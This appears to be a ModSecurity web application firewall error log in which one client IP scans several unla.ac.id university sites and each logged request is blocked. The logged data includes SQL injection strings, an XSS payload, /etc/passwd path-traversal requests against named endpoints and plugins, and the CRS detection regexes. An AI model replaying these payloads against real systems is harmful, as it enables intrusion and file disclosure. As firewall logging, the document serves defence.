[Tue Aug 29 11:43:00.481864 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "informatika.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAdxUTwAAAAC"]
[Tue Aug 29 11:43:00.491126 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: ,\\x22password\\x22: found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAdECcoAAAAW"]
[Tue Aug 29 11:43:01.413607 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VcCo-f0AAAeX1DUAAAAK"]
[Tue Aug 29 11:43:01.424778 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VcCo-f0AAAdSZPAAAAAX"]
[Tue Aug 29 11:43:01.430434 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VcCo-f0AAAeZ56IAAAAN"]
[Tue Aug 29 11:43:02.432247 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAc361YAAAAO"]
[Tue Aug 29 11:43:02.437585 2023] [:error] [pid 1960] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAeoBAcAAAAT"]
[Tue Aug 29 11:43:02.442435 2023] [:error] [pid 1887] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAdftVUAAAAG"]
[Tue Aug 29 11:43:02.453184 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAdTBDQAAAAY"]
[Tue Aug 29 11:43:03.412745 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAcoNmQAAAAF"]
[Tue Aug 29 11:43:03.415576 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAdQ3jgAAAAV"]
[Tue Aug 29 11:43:03.434213 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAXNuYkAAAAg"]
[Tue Aug 29 11:43:03.439607 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAcoNmUAAAAF"]
[Tue Aug 29 11:43:03.439937 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAcsLIUAAAAE"]
[Tue Aug 29 11:43:03.467080 2023] [:error] [pid 1945] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAeZ56cAAAAN"]
[Tue Aug 29 11:43:03.473505 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAdxUUMAAAAC"]
[Tue Aug 29 11:43:04.370695 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAcoNmcAAAAF"]
[Tue Aug 29 11:43:04.371587 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAeYbzgAAAAB"]
[Tue Aug 29 11:43:04.377171 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAXNuYwAAAAg"]
[Tue Aug 29 11:43:04.397277 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13WMCo-f0AAAdECdMAAAAW"]
[Tue Aug 29 11:43:04.404039 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAdTBDgAAAAY"]
[Tue Aug 29 11:43:04.424432 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAbo-gEAAAAi"]
[Tue Aug 29 11:43:04.429789 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAdb7nMAAAAb"]
[Tue Aug 29 11:43:04.471941 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAcoNmsAAAAF"]
[Tue Aug 29 11:43:04.474648 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAdTBDsAAAAY"]
[Tue Aug 29 11:43:04.480738 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAdxUUkAAAAC"]
[Tue Aug 29 11:43:04.482595 2023] [:error] [pid 1944] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAeYbzwAAAAB"]
[Tue Aug 29 11:43:05.391426 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WcCo-f0AAARpg4cAAAAU"]
[Tue Aug 29 11:43:05.397232 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WcCo-f0AAAdQ3j4AAAAV"]
[Tue Aug 29 11:43:06.404367 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAc4EpAAAAAP"]
[Tue Aug 29 11:43:06.417418 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAeChaIAAAAw"]
[Tue Aug 29 11:43:06.465733 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAeChaQAAAAw"]
[Tue Aug 29 11:43:06.489069 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAARpg44AAAAU"]
[Tue Aug 29 11:43:06.503654 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAeX1EcAAAAK"]
